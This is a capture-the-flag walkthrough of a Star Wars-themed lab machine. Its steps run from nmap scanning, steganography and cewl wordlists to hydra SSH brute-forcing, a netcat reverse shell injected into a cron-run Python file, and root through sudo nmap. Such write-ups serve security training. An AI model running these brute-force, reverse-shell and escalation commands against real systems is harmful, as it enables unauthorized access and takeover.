Let’s start with arp scanning discovering our target IP address using the netdiscover command. there have many arp scanning tools but I use always Nmap and netdiscover.
Now we have our target IP Address, the next step is to scan the target machine by using the Nmap tool. This is to find the open ports and services on the target machine
nmap -sV -sC 192.168.43.233
As we can see from this output we have two ports open. we saw the port 22 and 80 are open. We have the 21/SSH Service as well as an 80/HTTP Service on the server.
we navigate to a web browser and explored the host IP address and we see two same images and an comment ( Password you shall find ).
After reading the page source code and we found a base64 string. but not useful. then I download the image of our local system and starting the stenography image file I use different types of tools but they didn’t give me the right output.
I’m stuck here then I Found a ruby tool zsteg ( detect stegano-hidden data in PNG & BMP ) using the command you can download the tool.
sudo get install zsteg
zsteg -a yoga.png
After extract the image hidden data we found a password but we need a username. for more details again i started enumeration on port 80 and by checking robots.txt file we found an directory /r2d2
but there is nothing useful using the cewl tool I create a word-list by using the command.
sudo cewl http://192.168.43.233/r2d2 -vv -w word-pass.txt
I try the wordlist for ssh username. after spending one hour we couldn’t found any possible username then I search google for ( StarWars wordlist ) and I found a word-list you can download here the wordlists link and again try a new user list.
sudo vi user.txt hydra -L user.txt -p "babyYoda123" 192.168.43.233 ssh
After 217 tries hydra discover a possible username and password then now try to log in ssh server.
now I’m starting enumerating the user directory and i found a secrets notes file After i read the note.txt i see a hind Anakin is a cewl kid.
ls -lsa cd .secrets/ ls cat note.txt
and I found a group name anakin and there are two users Darth,skywalker
cat /etc/group |grep anakin
again I run the cewl tool for creating a new word-list and cread a usernames file using these command and again starting SSH brute-forcing.
sudo cewl http://192.168.43.233/r2d2 -vv -w word-pass.txt ls sudo echo -e "Darth\nskywalker" > /tmp/user.txt sudo hydra -L /tmp/user.txt -P word-pass.txt ssh://192.168.43.233
as we see again we found a valid username an password. i change our current user by using su ( switch user ) command and again we found a secrets note.txt file
su skywalker cd ~/ ls -lsa cd .secrets/ cat note.txt
after reading the note.txt file we move the Darth home directory and there I found a python file after reading the file we see a message this file is automatically run every minute and the Anakin group have read-write permission this file
cd /home/Darth/ cd .secrets/ cat evil.py
so I edit and creating a netcat reverse shell by using these commands but first we open a new console window and starting netcat listener any port.
nc -lvp 77 echo -e 'import os\nos.system("nc 192.168.43.103 77 -e /bin/bash")' > evil.py cat evil.py
After a minute we got reverse connection target machine and our user is changed to skywalker to Darth
sudo nc -lvp 77 sudo -l
Let run the sudo -l command to enumerate if this user can run some application with root privileges and without a password. and We found Darth user can run the Nmap command. I already read Nmap privilege escalation without wasting our time I run the privilege escalation command one by one.
var=$(mktemp) echo 'os.execute("/bin/bash")' > $var sudo nmap --script=$var
Now we have root shell target machine let’s move the root directory and read the our final flag.
cd /root ls cat flag.txt